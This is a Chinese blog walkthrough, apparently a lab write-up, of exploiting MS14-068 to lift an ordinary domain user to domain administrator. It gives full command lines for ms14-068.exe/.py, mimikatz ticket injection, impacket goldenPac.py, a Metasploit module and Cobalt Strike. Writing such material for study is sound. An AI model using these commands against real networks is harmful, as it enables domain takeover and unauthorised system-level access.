Pass The Ticket之ms14-068

前言

Pass The Ticket 也是横向渗透的一种攻击方式,简称ptt。而Ticket票据是利用kerberos 协议进行攻击的,所以之前先学了《kerberos 认证学习》
常见的有三种攻击方式:ms14-068、Golden Ticket(黄金票据)、Silver Ticket(白银票据)
我们今天先学习ms14-068,获取DC的一种方式。

漏洞起源

在kerberos 协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。
ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高权限的PAC。
漏洞细节参考:深入解读MS14-068漏洞:微软精心策划的后门?
该漏洞允许任何一个域普通用户,将自己提升至域管理员权限。微软给出的补丁号kb3011780。
测试在server 2012未成功利用该漏洞。

漏洞利用

测试环境
域:tide.org
域控制器 dc.tide.org,server 2008 服务器,IP为10.211.55.88
域用户 tidetest,server 2008 服务器,IP为10.211.55.8

假设我们通过NTLM-Hash或者明文密码获取了域用户tidetest的权限,就可以利用ms14-068漏洞将自己域用户提权为域管理员权限。以下实验操作均是在tidetest域用户权限下操作(非管理员权限)

在默认情况下,域用户tidetest是没有权限访问dc.tide.org(DC)的。

image.png

ms14-068.exe

1.获取域用户tidetest的SID
SID(安全标识符),是为域或本地计算机中创建每个帐户所分配的唯一ID字符串。

whoami /user
image.png

2.生成TGT票据
从github下载ms14-068.exe利用工具

ms14-068.exe  -u tidetest@tide.org -s S-1-5-21-2478348595-1372543966-1277690238-1104 -d 10.211.55.88 -p test@666
-u 域用户@域名
-s 域用户SID
-d 域控制器地址
-p 域成员密码

命令执行后,会创建.ccache文件。证明漏洞触发成功。

image.png

3.注入内存
再使用mimikatz将票据(TGT)注入到当前内存中,来伪造kerberos协议认证证书。

kerberos::purge         //清空当前所有凭证
kerberos::list          //查看当前凭证
kerberos::ptc TGT_tidetest@tide.org.ccache   //将票据注入到内存中
image.png

注入之前:

image.png

注入之后:

image.png
kerberos::list  可查看到凭证
image.png

继续使用PSTools目录下的PsExec64.exe获取cmdshell。获取域控制器权限,且为system权限。

image.png

ms14-068.py

该脚本也是产生一张kerberos的票据缓存,可以针对linux平台的kerberos认证,也可以是windows。
github下载windows-kernel-exploits ,切换至MS14-068目录下,可运行ms14-068.py文件。
注:单独下载ms14-068.py无法使用
命令为

python ms14-068.py  -u tidetest@tide.org -s S-1-5-21-2478348595-1372543966-1277690238-1104 -d 10.211.55.88 -p test@666

生成.ccache文件。

image.png

也是一样的道理,使用mimikatz注入票据

kerberos::ptc TGT_tidetest@tide.org.ccache
image.png

需要注意的是dir输入计算机名,而不是IP地址。

goldenPac.py

goldenPac.py脚本是impacket工具包里的。
先需要在kali上安装kerberos客户端:

apt-get install  krb5-user

再使用goldenPac.py脚本

goldenPac.py -dc-ip 1.1.1.1 -target-ip 2.2.2.2 domain.net/normaluser:mypwd@domain-host

命令为

python goldenPac.py -dc-ip 10.211.55.88 -target-ip 10.211.55.88 tide.org/tidetest:test@666@dc.tide.org

就可以直接获取cmdshell。

image.png

metasploit

使用ms14_068_kerberos_checksum模块

set domain tide.org
set user tidetest
set password test@666
set rhosts 10.211.55.88
set user_sid S-1-5-21-2478348595-1372543966-1277690238-1104
image.png

可导出bin文件,证明存在ms14-068漏洞。
但是后续在内存中导出Ticket,以及使用票据的过程中,始终出错。
有解决方案的小伙伴可以告诉我。

CobaltStrike

依然是使用ms14-068生成一个票据。
执行命令后会在当前目录生成.ccache 的文件
然后使用 KrbCredExport 将 .ccache文件转化为kirbi格式,也就是user.ticket。

python KrbCredExport.py TGT_tidetest@tide.org.ccache user.ticket

使用cobaltstrike 的 kerberos_ticket_use命令加载ticket。

image.png

加载后可以访问到DC。

image.png

如果要继续利用,可以利用当前的session对域控进行psh。

手动Add Target

image.png
image.png

勾选use session's current access token,选择获取tidetest域用户的session。

image.png

DC即可上线。

image.png

参考资料

MS14-068域权限提升漏洞总结
ms14-068之metasploit应用
通过 Cobalt Strike 利用 ms14-068

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,015评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,262评论 1 292
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,727评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,986评论 0 205
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,363评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,610评论 1 219
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,871评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,582评论 0 198
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,297评论 1 242
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,551评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,053评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,385评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,035评论 3 236
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,079评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,841评论 0 195
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,648评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,550评论 2 270

推荐阅读更多精彩内容

  • 这篇文章介绍了Mobile BI(移动商务智能)使用过程中涉及的各种身份认证的方式,主要目的是对这些方式的原理进行...
    雨_树阅读 1,898评论 1 2
  • 前言 内网渗透大多数为域渗透。学习域渗透kerberos协议就是绕不过的一个难点,白银票据、黄金票据、攻击域控都离...
    CSeroad阅读 4,125评论 0 5
  • 一、前言 概述Kerberos是一种计算机网络认证协议,它允许某实体在非安全网络环境下通信,向另一个实体以一种安全...
    香山上的麻雀阅读 9,329评论 0 1
  • 最近老在项目的shell脚本中看到kinit这个东西,完整的命令是 kinit -k -t ./conf/kerb...
    sherlockyb阅读 39,986评论 0 17
  • 今天是6月6日,明天就是端午节,我和儿子、儿媳一块去无锡“旅行”。 6:30我们准时出发。刚上车,突然...
    低调pan阅读 838评论 13 15